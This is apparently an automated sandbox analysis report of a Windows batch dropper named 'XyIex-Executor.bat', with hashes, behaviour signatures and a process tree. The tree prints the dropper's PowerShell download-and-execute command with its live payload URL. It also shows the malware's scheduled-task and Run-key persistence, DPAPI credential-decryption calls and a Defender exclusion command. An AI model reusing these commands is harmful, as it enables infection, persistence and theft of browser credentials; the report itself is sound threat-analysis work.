Analysis
-
max time kernel
150s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system -
submitted
03-06-2024 09:04
Static task
static1
Behavioral task
behavioral1
Sample
XyIex-Executor.bat
Resource
win10v2004-20240508-en
General
-
Target
XyIex-Executor.bat
-
Size
244B
-
MD5
ac122c56306baae12bc1dbc69455249a
-
SHA1
8f7be0cb0c88260843111257c349f5e2a0fa5b1a
-
SHA256
702d2a9930bf8d16752c3dbe1d5b5382c592c13e85e54fe0cd59df2ad4f764db
-
SHA512
a66df3c5a8c21561dad7ffba4eecc132fce6388797dabdd63eaa6d077d8ebf0298a0220331b0a8f28208a80f1b4cf3ec1ce74a76cf61b428bf03f2d2e637951b
Malware Config
Extracted
https://github.com/xylexV5/xylexz/releases/download/vypix/xylex.exe
Signatures
-
Blocklisted process makes network request 3 IoCs
Processes:
powershell.execurl.exeflow pid process 7 4380 powershell.exe 13 4380 powershell.exe 42 2360 curl.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs
Run Powershell and hide display window.
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 3876 powershell.exe 4996 powershell.exe 2708 powershell.exe 736 powershell.exe 4412 powershell.exe -
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
xylex.execscript.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Control Panel\International\Geo\Nation xylex.exe Key value queried \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\Control Panel\International\Geo\Nation cscript.exe -
Executes dropped EXE 1 IoCs
Processes:
xylex.exepid process 3260 xylex.exe -
Loads dropped DLL 1 IoCs
Processes:
xylex.exepid process 3260 xylex.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 2 IoCs
Processes:
powershell.exereg.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Powershell = "\"powershell.exe\" -WindowStyle Hidden -ExecutionPolicy Bypass -File \"C:\\Users\\Admin\\AppData\\Roaming\\jYXcOByvlSUdhPk.ps1\"" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Steam = "C:\\Users\\Admin\\AppData\\Local\\Temp\\xylex.exe" reg.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 39 api.ipify.org -
An obfuscated cmd.exe command-line is typically used to evade detection. 2 IoCs
Processes:
cmd.execmd.exepid process 3292 cmd.exe 2884 cmd.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
taskmgr.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName taskmgr.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Detects videocard installed 1 TTPs 10 IoCs
Uses WMIC.exe to determine videocard installed.
Processes:
WMIC.exeWMIC.exeWMIC.exeWMIC.exeWMIC.exeWMIC.exeWMIC.exeWMIC.exeWMIC.exeWMIC.exepid process 2260 WMIC.exe 1504 WMIC.exe 2260 WMIC.exe 5000 WMIC.exe 2100 WMIC.exe 5032 WMIC.exe 2884 WMIC.exe 2940 WMIC.exe 60 WMIC.exe 3140 WMIC.exe -
Enumerates processes with tasklist 1 TTPs 2 IoCs
Processes:
tasklist.exetasklist.exepid process 1140 tasklist.exe 2224 tasklist.exe -
Modifies registry class 1 IoCs
Processes:
taskmgr.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1337824034-2731376981-3755436523-1000_Classes\Local Settings taskmgr.exe -
Modifies registry key 1 TTPs 2 IoCs
-
Opens file in notepad (likely ransom note) 1 IoCs
Processes:
NOTEPAD.EXEpid process 2636 NOTEPAD.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exexylex.exetaskmgr.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 4380 powershell.exe 4380 powershell.exe 4996 powershell.exe 4996 powershell.exe 4996 powershell.exe 3444 powershell.exe 3444 powershell.exe 3444 powershell.exe 4788 powershell.exe 4788 powershell.exe 4788 powershell.exe 3876 powershell.exe 3876 powershell.exe 3876 powershell.exe 736 powershell.exe 736 powershell.exe 736 powershell.exe 4516 powershell.exe 4516 powershell.exe 4516 powershell.exe 4412 powershell.exe 4412 powershell.exe 4412 powershell.exe 2396 powershell.exe 2396 powershell.exe 2396 powershell.exe 1364 powershell.exe 1364 powershell.exe 1364 powershell.exe 2708 powershell.exe 2708 powershell.exe 2708 powershell.exe 4260 powershell.exe 4260 powershell.exe 4260 powershell.exe 3196 powershell.exe 3196 powershell.exe 3196 powershell.exe 3260 xylex.exe 3260 xylex.exe 3260 xylex.exe 3920 taskmgr.exe 3920 taskmgr.exe 2084 powershell.exe 2084 powershell.exe 2084 powershell.exe 3920 taskmgr.exe 3920 taskmgr.exe 4248 powershell.exe 4248 powershell.exe 4248 powershell.exe 3920 taskmgr.exe 3016 powershell.exe 3016 powershell.exe 3016 powershell.exe 3920 taskmgr.exe 2476 powershell.exe 2476 powershell.exe 3920 taskmgr.exe 2476 powershell.exe 3920 taskmgr.exe 3920 taskmgr.exe 3920 taskmgr.exe 3920 taskmgr.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
taskmgr.exepid process 3920 taskmgr.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowershell.exetasklist.exetasklist.exepowershell.exepowershell.exeWMIC.exeWMIC.exepowershell.exedescription pid process Token: SeDebugPrivilege 4380 powershell.exe Token: SeDebugPrivilege 4996 powershell.exe Token: SeDebugPrivilege 1140 tasklist.exe Token: SeDebugPrivilege 2224 tasklist.exe Token: SeDebugPrivilege 3444 powershell.exe Token: SeDebugPrivilege 4788 powershell.exe Token: SeIncreaseQuotaPrivilege 2020 WMIC.exe Token: SeSecurityPrivilege 2020 WMIC.exe Token: SeTakeOwnershipPrivilege 2020 WMIC.exe Token: SeLoadDriverPrivilege 2020 WMIC.exe Token: SeSystemProfilePrivilege 2020 WMIC.exe Token: SeSystemtimePrivilege 2020 WMIC.exe Token: SeProfSingleProcessPrivilege 2020 WMIC.exe Token: SeIncBasePriorityPrivilege 2020 WMIC.exe Token: SeCreatePagefilePrivilege 2020 WMIC.exe Token: SeBackupPrivilege 2020 WMIC.exe Token: SeRestorePrivilege 2020 WMIC.exe Token: SeShutdownPrivilege 2020 WMIC.exe Token: SeDebugPrivilege 2020 WMIC.exe Token: SeSystemEnvironmentPrivilege 2020 WMIC.exe Token: SeRemoteShutdownPrivilege 2020 WMIC.exe Token: SeUndockPrivilege 2020 WMIC.exe Token: SeManageVolumePrivilege 2020 WMIC.exe Token: 33 2020 WMIC.exe Token: 34 2020 WMIC.exe Token: 35 2020 WMIC.exe Token: 36 2020 WMIC.exe Token: SeIncreaseQuotaPrivilege 4804 WMIC.exe Token: SeSecurityPrivilege 4804 WMIC.exe Token: SeTakeOwnershipPrivilege 4804 WMIC.exe Token: SeLoadDriverPrivilege 4804 WMIC.exe Token: SeSystemProfilePrivilege 4804 WMIC.exe Token: SeSystemtimePrivilege 4804 WMIC.exe Token: SeProfSingleProcessPrivilege 4804 WMIC.exe Token: SeIncBasePriorityPrivilege 4804 WMIC.exe Token: SeCreatePagefilePrivilege 4804 WMIC.exe Token: SeBackupPrivilege 4804 WMIC.exe Token: SeRestorePrivilege 4804 WMIC.exe Token: SeShutdownPrivilege 4804 WMIC.exe Token: SeDebugPrivilege 4804 WMIC.exe Token: SeSystemEnvironmentPrivilege 4804 WMIC.exe Token: SeRemoteShutdownPrivilege 4804 WMIC.exe Token: SeUndockPrivilege 4804 WMIC.exe Token: SeManageVolumePrivilege 4804 WMIC.exe Token: 33 4804 WMIC.exe Token: 34 4804 WMIC.exe Token: 35 4804 WMIC.exe Token: 36 4804 WMIC.exe Token: SeDebugPrivilege 3876 powershell.exe Token: SeIncreaseQuotaPrivilege 2020 WMIC.exe Token: SeSecurityPrivilege 2020 WMIC.exe Token: SeTakeOwnershipPrivilege 2020 WMIC.exe Token: SeLoadDriverPrivilege 2020 WMIC.exe Token: SeSystemProfilePrivilege 2020 WMIC.exe Token: SeSystemtimePrivilege 2020 WMIC.exe Token: SeProfSingleProcessPrivilege 2020 WMIC.exe Token: SeIncBasePriorityPrivilege 2020 WMIC.exe Token: SeCreatePagefilePrivilege 2020 WMIC.exe Token: SeBackupPrivilege 2020 WMIC.exe Token: SeRestorePrivilege 2020 WMIC.exe Token: SeShutdownPrivilege 2020 WMIC.exe Token: SeDebugPrivilege 2020 WMIC.exe Token: SeSystemEnvironmentPrivilege 2020 WMIC.exe Token: SeRemoteShutdownPrivilege 2020 WMIC.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
Processes:
taskmgr.exepid process 3920 taskmgr.exe 3920 taskmgr.exe 3920 taskmgr.exe 3920 taskmgr.exe 3920 taskmgr.exe 3920 taskmgr.exe 3920 taskmgr.exe 3920 taskmgr.exe 3920 taskmgr.exe 3920 taskmgr.exe 3920 taskmgr.exe 3920 taskmgr.exe 3920 taskmgr.exe 3920 taskmgr.exe 3920 taskmgr.exe 3920 taskmgr.exe 3920 taskmgr.exe 3920 taskmgr.exe 3920 taskmgr.exe 3920 taskmgr.exe 3920 taskmgr.exe 3920 taskmgr.exe 3920 taskmgr.exe 3920 taskmgr.exe 3920 taskmgr.exe 3920 taskmgr.exe 3920 taskmgr.exe 3920 taskmgr.exe 3920 taskmgr.exe 3920 taskmgr.exe 3920 taskmgr.exe 3920 taskmgr.exe 3920 taskmgr.exe 3920 taskmgr.exe 3920 taskmgr.exe 3920 taskmgr.exe 3920 taskmgr.exe 3920 taskmgr.exe 3920 taskmgr.exe 3920 taskmgr.exe 3920 taskmgr.exe 3920 taskmgr.exe 3920 taskmgr.exe 3920 taskmgr.exe 3920 taskmgr.exe 3920 taskmgr.exe 3920 taskmgr.exe 3920 taskmgr.exe 3920 taskmgr.exe 3920 taskmgr.exe 3920 taskmgr.exe 3920 taskmgr.exe 3920 taskmgr.exe 3920 taskmgr.exe 3920 taskmgr.exe 3920 taskmgr.exe 3920 taskmgr.exe 3920 taskmgr.exe 3920 taskmgr.exe 3920 taskmgr.exe 3920 taskmgr.exe 3920 taskmgr.exe 3920 taskmgr.exe 3920 taskmgr.exe -
Suspicious use of SendNotifyMessage 64 IoCs
Processes:
taskmgr.exepid process 3920 taskmgr.exe 3920 taskmgr.exe 3920 taskmgr.exe 3920 taskmgr.exe 3920 taskmgr.exe 3920 taskmgr.exe 3920 taskmgr.exe 3920 taskmgr.exe 3920 taskmgr.exe 3920 taskmgr.exe 3920 taskmgr.exe 3920 taskmgr.exe 3920 taskmgr.exe 3920 taskmgr.exe 3920 taskmgr.exe 3920 taskmgr.exe 3920 taskmgr.exe 3920 taskmgr.exe 3920 taskmgr.exe 3920 taskmgr.exe 3920 taskmgr.exe 3920 taskmgr.exe 3920 taskmgr.exe 3920 taskmgr.exe 3920 taskmgr.exe 3920 taskmgr.exe 3920 taskmgr.exe 3920 taskmgr.exe 3920 taskmgr.exe 3920 taskmgr.exe 3920 taskmgr.exe 3920 taskmgr.exe 3920 taskmgr.exe 3920 taskmgr.exe 3920 taskmgr.exe 3920 taskmgr.exe 3920 taskmgr.exe 3920 taskmgr.exe 3920 taskmgr.exe 3920 taskmgr.exe 3920 taskmgr.exe 3920 taskmgr.exe 3920 taskmgr.exe 3920 taskmgr.exe 3920 taskmgr.exe 3920 taskmgr.exe 3920 taskmgr.exe 3920 taskmgr.exe 3920 taskmgr.exe 3920 taskmgr.exe 3920 taskmgr.exe 3920 taskmgr.exe 3920 taskmgr.exe 3920 taskmgr.exe 3920 taskmgr.exe 3920 taskmgr.exe 3920 taskmgr.exe 3920 taskmgr.exe 3920 taskmgr.exe 3920 taskmgr.exe 3920 taskmgr.exe 3920 taskmgr.exe 3920 taskmgr.exe 3920 taskmgr.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
cmd.exepowershell.exexylex.execmd.exepowershell.execsc.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exedescription pid process target process PID 4472 wrote to memory of 4380 4472 cmd.exe powershell.exe PID 4472 wrote to memory of 4380 4472 cmd.exe powershell.exe PID 4380 wrote to memory of 3260 4380 powershell.exe xylex.exe PID 4380 wrote to memory of 3260 4380 powershell.exe xylex.exe PID 3260 wrote to memory of 3508 3260 xylex.exe cmd.exe PID 3260 wrote to memory of 3508 3260 xylex.exe cmd.exe PID 3508 wrote to memory of 1956 3508 cmd.exe cmd.exe PID 3508 wrote to memory of 1956 3508 cmd.exe cmd.exe PID 3508 wrote to memory of 4996 3508 cmd.exe powershell.exe PID 3508 wrote to memory of 4996 3508 cmd.exe powershell.exe PID 4996 wrote to memory of 3688 4996 powershell.exe csc.exe PID 4996 wrote to memory of 3688 4996 powershell.exe csc.exe PID 3688 wrote to memory of 1268 3688 csc.exe cvtres.exe PID 3688 wrote to memory of 1268 3688 csc.exe cvtres.exe PID 3260 wrote to memory of 1276 3260 xylex.exe cmd.exe PID 3260 wrote to memory of 1276 3260 xylex.exe cmd.exe PID 1276 wrote to memory of 3452 1276 cmd.exe curl.exe PID 1276 wrote to memory of 3452 1276 cmd.exe curl.exe PID 3260 wrote to memory of 3440 3260 xylex.exe cmd.exe PID 3260 wrote to memory of 3440 3260 xylex.exe cmd.exe PID 3440 wrote to memory of 1140 3440 cmd.exe tasklist.exe PID 3440 wrote to memory of 1140 3440 cmd.exe tasklist.exe PID 3260 wrote to memory of 4496 3260 xylex.exe cmd.exe PID 3260 wrote to memory of 4496 3260 xylex.exe cmd.exe PID 3260 wrote to memory of 3292 3260 xylex.exe cmd.exe PID 3260 wrote to memory of 3292 3260 xylex.exe cmd.exe PID 4496 wrote to memory of 2224 4496 cmd.exe tasklist.exe PID 4496 wrote to memory of 2224 4496 cmd.exe tasklist.exe PID 3292 wrote to memory of 3444 3292 cmd.exe powershell.exe PID 3292 wrote to memory of 3444 3292 cmd.exe powershell.exe PID 3260 wrote to memory of 2884 3260 xylex.exe cmd.exe PID 3260 wrote to memory of 2884 3260 xylex.exe cmd.exe PID 2884 wrote to memory of 4788 2884 cmd.exe powershell.exe PID 2884 wrote to memory of 4788 2884 cmd.exe powershell.exe PID 3260 wrote to memory of 3472 3260 xylex.exe cmd.exe PID 3260 wrote to memory of 3472 3260 xylex.exe cmd.exe PID 3260 wrote to memory of 896 3260 xylex.exe cmd.exe PID 3260 wrote to memory of 896 3260 xylex.exe cmd.exe PID 3260 wrote to memory of 4048 3260 xylex.exe cmd.exe PID 3260 wrote to memory of 4048 3260 xylex.exe cmd.exe PID 3260 wrote to memory of 644 3260 xylex.exe cmd.exe PID 3260 wrote to memory of 644 3260 xylex.exe cmd.exe PID 3260 wrote to memory of 4324 3260 xylex.exe cmd.exe PID 3260 wrote to memory of 4324 3260 xylex.exe cmd.exe PID 896 wrote to memory of 1084 896 cmd.exe reg.exe PID 896 wrote to memory of 1084 896 cmd.exe reg.exe PID 3472 wrote to memory of 2020 3472 cmd.exe WMIC.exe PID 3472 wrote to memory of 2020 3472 cmd.exe WMIC.exe PID 4048 wrote to memory of 5084 4048 cmd.exe schtasks.exe PID 4048 wrote to memory of 5084 4048 cmd.exe schtasks.exe PID 644 wrote to memory of 3876 644 cmd.exe powershell.exe PID 644 wrote to memory of 3876 644 cmd.exe powershell.exe PID 4324 wrote to memory of 4804 4324 cmd.exe curl.exe PID 4324 wrote to memory of 4804 4324 cmd.exe curl.exe PID 3260 wrote to memory of 1956 3260 xylex.exe cmd.exe PID 3260 wrote to memory of 1956 3260 xylex.exe cmd.exe PID 1956 wrote to memory of 1608 1956 cmd.exe cscript.exe PID 1956 wrote to memory of 1608 1956 cmd.exe cscript.exe PID 3260 wrote to memory of 760 3260 xylex.exe cmd.exe PID 3260 wrote to memory of 760 3260 xylex.exe cmd.exe PID 760 wrote to memory of 4756 760 cmd.exe WMIC.exe PID 760 wrote to memory of 4756 760 cmd.exe WMIC.exe PID 3260 wrote to memory of 2796 3260 xylex.exe WMIC.exe PID 3260 wrote to memory of 2796 3260 xylex.exe WMIC.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\XyIex-Executor.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:4472 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell $down=New-Object System.Net.WebClient;$url='https://github.com/xylexV5/xylexz/releases/download/vypix/xylex.exe';$file='xylex.exe'; $down.DownloadFile($url,$file);$exec=New-Object -com shell.application;$exec.shellexecute($file);exit2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4380 -
C:\Users\Admin\AppData\Local\Temp\xylex.exe"C:\Users\Admin\AppData\Local\Temp\xylex.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3260 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "type .\temp.ps1 | powershell.exe -noprofile -"4⤵
- Suspicious use of WriteProcessMemory
PID:3508 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" type .\temp.ps1 "5⤵PID:1956
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -noprofile -5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4996 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\znzi4rtn\znzi4rtn.cmdline"6⤵
- Suspicious use of WriteProcessMemory
PID:3688 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7E58.tmp" "c:\Users\Admin\AppData\Local\Temp\znzi4rtn\CSC3B7EE9778B6E4BF4A4CE555DFFC4CC12.TMP"7⤵PID:1268
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"4⤵
- Suspicious use of WriteProcessMemory
PID:1276 -
C:\Windows\system32\curl.execurl http://api.ipify.org/ --ssl-no-revoke5⤵PID:3452
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"4⤵
- Suspicious use of WriteProcessMemory
PID:3440 -
C:\Windows\system32\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1140
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "tasklist"4⤵
- Suspicious use of WriteProcessMemory
PID:4496 -
C:\Windows\system32\tasklist.exetasklist5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:2224
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,123,210,181,210,198,217,30,79,143,44,142,139,125,65,164,21,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,33,156,90,107,92,234,10,181,133,211,213,132,225,131,203,19,43,3,49,39,190,150,249,21,61,57,49,200,210,141,111,17,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,214,130,109,140,61,204,74,148,189,62,217,154,132,189,29,160,26,234,209,30,83,79,12,6,129,130,103,41,196,208,66,54,48,0,0,0,236,8,218,121,146,205,107,71,207,134,9,211,133,7,82,203,50,134,32,93,11,238,254,63,23,243,203,194,220,127,112,141,162,163,30,223,124,74,182,37,157,68,135,13,26,90,83,83,64,0,0,0,236,16,138,167,200,115,64,250,162,134,117,14,7,53,89,144,157,205,82,149,198,14,40,220,234,159,129,235,18,113,4,59,0,212,17,133,25,130,151,144,176,122,34,55,195,60,202,67,224,172,20,174,133,84,215,190,203,254,174,41,10,104,192,145), $null, 'CurrentUser')"4⤵
- An obfuscated cmd.exe command-line is typically used to evade detection.
- Suspicious use of WriteProcessMemory
PID:3292 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,123,210,181,210,198,217,30,79,143,44,142,139,125,65,164,21,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,33,156,90,107,92,234,10,181,133,211,213,132,225,131,203,19,43,3,49,39,190,150,249,21,61,57,49,200,210,141,111,17,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,214,130,109,140,61,204,74,148,189,62,217,154,132,189,29,160,26,234,209,30,83,79,12,6,129,130,103,41,196,208,66,54,48,0,0,0,236,8,218,121,146,205,107,71,207,134,9,211,133,7,82,203,50,134,32,93,11,238,254,63,23,243,203,194,220,127,112,141,162,163,30,223,124,74,182,37,157,68,135,13,26,90,83,83,64,0,0,0,236,16,138,167,200,115,64,250,162,134,117,14,7,53,89,144,157,205,82,149,198,14,40,220,234,159,129,235,18,113,4,59,0,212,17,133,25,130,151,144,176,122,34,55,195,60,202,67,224,172,20,174,133,84,215,190,203,254,174,41,10,104,192,145), $null, 'CurrentUser')5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3444
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,123,210,181,210,198,217,30,79,143,44,142,139,125,65,164,21,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,169,185,211,78,126,178,233,113,146,165,226,217,166,46,54,58,7,126,2,46,52,51,8,33,165,252,252,33,23,55,170,117,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,17,11,201,141,126,201,93,71,249,169,78,142,80,33,175,239,206,207,106,1,120,226,109,40,148,210,70,217,136,37,103,93,48,0,0,0,196,143,154,93,178,189,8,54,194,213,193,83,116,53,243,111,111,77,200,213,127,10,114,6,231,115,160,210,133,174,254,89,248,212,39,71,125,70,83,162,94,87,174,78,120,53,111,193,64,0,0,0,230,177,176,152,136,15,179,107,163,31,172,7,147,247,157,248,126,206,103,252,231,212,64,164,231,127,156,232,77,46,46,112,8,236,160,141,113,40,61,129,30,155,244,246,72,26,227,154,16,181,136,68,101,194,90,66,46,20,238,131,114,189,199,162), $null, 'CurrentUser')"4⤵
- An obfuscated cmd.exe command-line is typically used to evade detection.
- Suspicious use of WriteProcessMemory
PID:2884 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,123,210,181,210,198,217,30,79,143,44,142,139,125,65,164,21,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,169,185,211,78,126,178,233,113,146,165,226,217,166,46,54,58,7,126,2,46,52,51,8,33,165,252,252,33,23,55,170,117,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,17,11,201,141,126,201,93,71,249,169,78,142,80,33,175,239,206,207,106,1,120,226,109,40,148,210,70,217,136,37,103,93,48,0,0,0,196,143,154,93,178,189,8,54,194,213,193,83,116,53,243,111,111,77,200,213,127,10,114,6,231,115,160,210,133,174,254,89,248,212,39,71,125,70,83,162,94,87,174,78,120,53,111,193,64,0,0,0,230,177,176,152,136,15,179,107,163,31,172,7,147,247,157,248,126,206,103,252,231,212,64,164,231,127,156,232,77,46,46,112,8,236,160,141,113,40,61,129,30,155,244,246,72,26,227,154,16,181,136,68,101,194,90,66,46,20,238,131,114,189,199,162), $null, 'CurrentUser')5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4788
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic diskdrive get serialnumber"4⤵
- Suspicious use of WriteProcessMemory
PID:3472 -
C:\Windows\System32\Wbem\WMIC.exewmic diskdrive get serialnumber5⤵
- Suspicious use of AdjustPrivilegeToken
PID:2020
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Steam /f"4⤵
- Suspicious use of WriteProcessMemory
PID:896 -
C:\Windows\system32\reg.exereg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Steam /f5⤵PID:1084
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "schtasks /create /tn "GoogleUpdateTaskMachineUAC" /tr "cscript //nologo C:\ProgramData\edge\Updater\RunBatHidden.vbs" /sc minute /mo 10 /f /RU SYSTEM"4⤵
- Suspicious use of WriteProcessMemory
PID:4048 -
C:\Windows\system32\schtasks.exeschtasks /create /tn "GoogleUpdateTaskMachineUAC" /tr "cscript //nologo C:\ProgramData\edge\Updater\RunBatHidden.vbs" /sc minute /mo 10 /f /RU SYSTEM5⤵
- Creates scheduled task(s)
PID:5084
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\edge\Updater\Get-Clipboard.ps1""4⤵
- Suspicious use of WriteProcessMemory
PID:644 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\edge\Updater\Get-Clipboard.ps1"5⤵
- Command and Scripting Interpreter: PowerShell
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3876 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\sphyr0xn\sphyr0xn.cmdline"6⤵PID:2476
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES857C.tmp" "c:\Users\Admin\AppData\Local\Temp\sphyr0xn\CSC96AECEE9D8134FC2BA75CC82A3D0DE.TMP"7⤵PID:1156
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"4⤵
- Suspicious use of WriteProcessMemory
PID:4324 -
C:\Windows\System32\Wbem\WMIC.exewmic bios get smbiosbiosversion5⤵
- Suspicious use of AdjustPrivilegeToken
PID:4804
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "cscript //nologo "C:\ProgramData\edge\Updater\RunBatHidden.vbs""4⤵
- Suspicious use of WriteProcessMemory
PID:1956 -
C:\Windows\system32\cscript.execscript //nologo "C:\ProgramData\edge\Updater\RunBatHidden.vbs"5⤵
- Checks computer location settings
PID:1608 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\ProgramData\edge\Updater\CheckEpicGamesLauncher.bat" "6⤵PID:4644
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"7⤵
